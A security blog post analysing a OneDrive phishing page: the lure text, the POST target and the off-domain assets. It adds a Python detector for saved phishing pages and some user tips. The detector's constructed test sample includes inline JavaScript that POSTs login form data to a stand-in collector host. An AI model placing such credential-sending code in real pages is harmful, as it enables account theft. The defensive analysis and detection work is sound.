Onedrive phishing scam analysis 2022

Published by Reza Rafati on

I have written this analysis for you. I hope that it will help you to get a better understanding of the Onedrive phishing attack and that it will help you to protect yourself and others from similar phishing attacks.

Cybercriminals have created phishing attacks aimed at users of the cloud storage service Onedrive. They target Onedrive because the credentials it asks for are Microsoft account credentials: once those have been stolen via the Onedrive phishing page, the criminals have access to every Microsoft service tied to that account, including the victim's email.

Onedrive phishing scam

I navigated to the URLscan website and started searching for some active Onedrive phishing scams, and I quickly found one which looked visually very clean.

The Onedrive phishing page

So I decided to take a deeper look at the phishing page. I now had the Onedrive phishing details, and I could also take a look at the HTML source code.

From there I continued to the source code of the phishing page, where I quickly started my search for any “POST” requests. This allowed me to quickly see if something in the page has the function to send data.

Having found the POST function, it was clear to me that data is being sent somewhere, and I have a strong suspicion that it is not towards the official Microsoft service which handles login requests. Additionally, we can also see again that the cybercriminals are trying to scam their victims by claiming that the document is protected.

This document is protected, please input the email address document was shared with

Piece of text the cybercriminals used in the phishing attack

They state this in order to trick their victims into providing their login details. We can also notice that the images used in the phishing attack are actually loaded from servers that have nothing to do with Microsoft or Onedrive.

Onedrive logo being loaded from random website

I had to take a deeper look to actually find the piece of code that is responsible for sending away the data, and I noticed that the responsible one is email.js. You can view the harmless code here. There you can see that multiple options can be provided on how the phishing page should act. One of the options is where the data should be sent.

Click on Email.js “Show response” to view the source code via URLscan

Tips to identify Onedrive phishing attacks

I hope that this technical quick view has helped you to identify Onedrive phishing pages. But just to be certain, I will list some more tips for you:

  • If the domain is not the official Onedrive domain, then simply close the window and leave that page. A genuine Onedrive sign-in happens on Microsoft-owned domains such as onedrive.live.com, login.live.com and login.microsoftonline.com; a URL that merely contains the word “onedrive” somewhere in its subdomain or path does not count.
  • If you notice in the source code that resources (logos, scripts, the target of the login form) are being loaded from or sent to hosts that are not the official Onedrive domain, then simply close the window.
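The checks walked through above (a POST that does not go to Microsoft, a logo and a sending script loaded from unrelated hosts, the “document is protected” lure text) and the two tips just listed can be scripted against the page body saved from URLscan. The following is an added example written for this page, not code from the original post or from URLscan; the trusted-suffix list, the two sample pages and the collector URL in them are constructed assumptions for illustration. It goes slightly beyond the single page described in the post: it also treats relative form actions and script-side `fetch`/XHR calls as sending targets, and it anchors the domain match on a dot so that a host like `onedrive.live.com.attacker.example` is not mistaken for Microsoft.

```python
"""Static triage of a saved phishing page: where do credentials go, and where
do the page's resources come from? Added example, not code from the post."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption of this example: Microsoft-owned suffixes on which a genuine
# OneDrive sign-in page posts credentials and loads its assets. Anything else
# on a page that claims to be OneDrive is reported as a finding.
TRUSTED_SUFFIXES = (
    "microsoft.com", "microsoftonline.com", "live.com", "office.com",
    "office.net", "sharepoint.com", "onedrive.com", "msauth.net", "msftauth.net",
)
# Calls that send data from JavaScript; when one is present, every absolute
# URL in the inline scripts is a candidate exfiltration target.
SEND_CALL = re.compile(r"fetch\(|XMLHttpRequest|\$\.(post|ajax)\(|emailjs\.send", re.I)
ABS_URL = re.compile(r"""["'](https?://[^"'\s]+)["']""")
LURE = re.compile(r"this document is protected", re.I)


def host_is_trusted(url, page_host):
    """True if url's host is on the trusted list. Relative URLs inherit page_host.
    The suffix match is anchored on a dot, so 'live.com.evil.example' is rejected."""
    host = (urlparse(url).hostname or page_host).lower()
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


class PageInspector(HTMLParser):
    """Collects forms, loaded resources, inline script bodies and visible text."""

    def __init__(self):
        super().__init__()
        self.forms, self.resources, self.scripts, self.text = [], [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append(((a.get("method") or "get").lower(), a.get("action") or ""))
        elif tag in ("img", "script", "link", "iframe") and (a.get("src") or a.get("href")):
            self.resources.append((tag, a.get("src") or a.get("href")))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.scripts if self._in_script else self.text).append(data)


def inspect_page(html, page_url):
    """Return a list of (kind, detail) findings for a saved page and its URL."""
    page_host = (urlparse(page_url).hostname or "").lower()
    parser = PageInspector()
    parser.feed(html)
    findings = []
    if not host_is_trusted(page_url, page_host):
        findings.append(("page_host", page_host))
    for method, action in parser.forms:          # tip 1: where does the form POST?
        if method == "post" and not host_is_trusted(action, page_host):
            findings.append(("post_target", action or page_url))
    for tag, url in parser.resources:            # tip 2: logos/scripts from elsewhere
        if not host_is_trusted(url, page_host):
            findings.append(("external_resource", f"{tag}:{url}"))
    js = "\n".join(parser.scripts)               # the email.js-style sender
    if SEND_CALL.search(js):
        for url in ABS_URL.findall(js):
            if not host_is_trusted(url, page_host):
                findings.append(("script_post_target", url))
    lure = LURE.search(" ".join(parser.text))    # the pressure text
    if lure:
        findings.append(("lure_text", lure.group(0)))
    return findings


# Constructed sample modelled on the page described in the post: lure text, a
# POST form, a logo from an unrelated CDN and a script that ships the
# credentials to a collector. All hosts here are made-up example domains.
PHISH_URL = "https://share-docs.example.net/onedrive/index.html"
PHISH_HTML = """<html><body>
<img src="https://cdn.example.org/img/onedrive-logo.png">
<p>This document is protected, please input the email address document was shared with</p>
<form id="login" method="POST" action="">
  <input name="email"><input name="password" type="password">
</form>
<script src="https://cdn.example.org/email.js"></script>
<script>
  document.getElementById("login").onsubmit = function (e) {
    e.preventDefault();
    fetch("https://collector.example.com/submit", {method: "POST", body: new FormData(e.target)});
  };
</script>
</body></html>"""

# Constructed control: a sign-in page that stays on Microsoft hosts throughout.
LEGIT_URL = "https://onedrive.live.com/"
LEGIT_HTML = """<html><body>
<img src="https://aadcdn.msauth.net/logo.svg">
<form method="POST" action="https://login.microsoftonline.com/common/login">
  <input name="loginfmt">
</form>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in inspect_page(PHISH_HTML, PHISH_URL):
        print(f"{kind:20} {detail}")
    print("control findings:", inspect_page(LEGIT_HTML, LEGIT_URL))
```

To use it on a real case, save the body shown under “Show response” in URLscan to a file and call `inspect_page(open(path).read(), scanned_url)`; the `script_post_target` and `post_target` hosts are the ones to block or report, since that is where the stolen credentials are delivered.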

Urgent or final warnings

Many cybercriminals try to pressure you with final warnings or emergency notifications. An example of such a message is “This document is protected, please input the email address document was shared with”. Do not respond to this; if in doubt, log in through the official Onedrive site instead, as a document that was genuinely shared with you will be listed there.

That's it, but if you want, you can take a look at my quick URLscan threat hunting guide.


Reza Rafati

Founder of Cyberwarzone.com.